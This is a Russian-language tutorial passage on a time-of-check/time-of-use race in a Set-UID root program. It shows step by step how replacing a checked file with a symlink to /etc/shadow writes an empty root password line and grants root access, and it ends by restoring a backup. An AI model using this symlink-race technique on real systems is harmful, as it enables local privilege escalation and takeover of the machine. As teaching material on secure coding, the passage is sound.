Рассмотрим поведение Set-UID программы, которой нужно сохранить данные в файле, принадлежащем пользователю. Мы могли бы, например, рассмотреть случай почтовой транспортной программы, такой как sendmail. Предположим, что пользователь может задать как имя файла, так и сообщение для записи в файл, что достаточно правдоподобно при некоторых обстоятельствах. В этом случае приложение должно проверить, принадлежит ли файл лицу, запустившему программу. Оно также проверит, что файл не является символической ссылкой на системный файл. Не будем забывать, что наша программа Set-UID root, и ей позволено изменять любой файл на машине. Соответственно она сравнит владельца файла со своим истинным UID. Давайте напишем что-нибудь вроде:
Как мы объясняли в нашей первой статье, было бы лучше для Set-UID приложения временно понизить свои привилегии и открыть файл, используя UID пользователя, запустившего его. Фактически, вышеописанная ситуация соответствует демону, предоставляющему услуги каждому пользователю. Всегда выполняясь под ID root-а, он должен бы делать проверку, используя UID вместо собственного истинного UID. И все же, мы оставим пока все как и есть, даже если это не так уж и правдоподобно, это поможет нам понять проблему, легко воспользовавшись дырой в безопасности.
Как мы можем видеть, программа начинает выполнение, проделывая все необходимые проверки, то есть: файл существует, принадлежит пользователю и это обычный файл. Далее она открывает файл и записывает сообщение. Вот где находится дыра! Или, более точно, она в промежутке времени между чтением атрибутов файла при помощи stat() и его открытием при помощи fopen(). Этот промежуток часто черезвычайно мал, однако атакующий может воспользоватся им и поменять параметры файла. Чтобы сделать нашу атаку попроще, добавим строку, которая заставит процесс ждать между двумя операциями, таким образом мы получим время, чтобы сделать работу вручную. Поменяем строку 30 (ранее пустую) и вставим:
30 sleep (20);
Теперь давайте выполним программу. Сначала сделаем ее Set-UID root. Сделаем, что очень важно, резервную копию нашего файла паролей /etc/shadow:
$ cc ex_01.c -Wall -o ex_01
$ su
Password:
# cp /etc/shadow /etc/shadow.bak
# chown root.root ex_01
# chmod +s ex_01
# exit
$ ls -l ex_01
-rwsrwsr-x 1 root root 15454 Jan 30 14:14 ex_01
$
Все готово для атаки. Мы в дериктории, принадлежащей нам. Мы имеем Set-UID root утилиту (здесь ex_01), содержащую дыру в безопасности, и желаем заменить строку, соответствующую root из файла паролей /etc/shadow на строку, содержащую пустой пароль.
Сначала мы создаем файл fic, принадлежащий нам:
$ rm -f fic
$ touch fic
Далее, мы запускаем наше приложение в фоновом режиме. Мы просим его записать строку в этот файл. Приложение проверяет что следует и "засыпает" на некоторое время перед настоящим доступом к файлу.
$ ./ex_01 fic "root::1:99999:::::" &
[1] 4426
Содержимое строки root взято из man страницы shadow(5), самое важное - то что второе поле пусто (нет пароля). Пока процесс спит, у нас есть около 20 секунд, чтобы удалить файл fic и заменить его ссылкой (символической или жесткой - обе сработают) на файл /etc/shadow. Вспомним, что любой пользователь может создавать ссылку на файл в приндлежащей ему директории, даже если он не может прочитать его содержимое (или в /tmp, что мы увидим чуть попозже). Однако невозможно создать копию такого файла, так как это требует его полного прочтения.
$ rm -f fic
$ ln -s /etc/shadow ./fic
Далее мы попросим оболочку вернуть процесс ex_01 в приоритетный режим при помощи команды fg и подождем пока он завершится:
$ fg
./ex_01 fic "root::1:99999:::::"
Write Ok
$
Вуаля! Готово. Файл /etc/shadow содержит только одну строку, которая говорит, что root не имеет пароля. Вы не верите?
$ su
# whoami
root
# cat /etc/shadow
root::1:99999:::::
#
Закончим наш эксперимент, вернув старый файл паролей:
# cp /etc/shadow.bak /etc/shadow
cp: replace `/etc/shadow'? y
#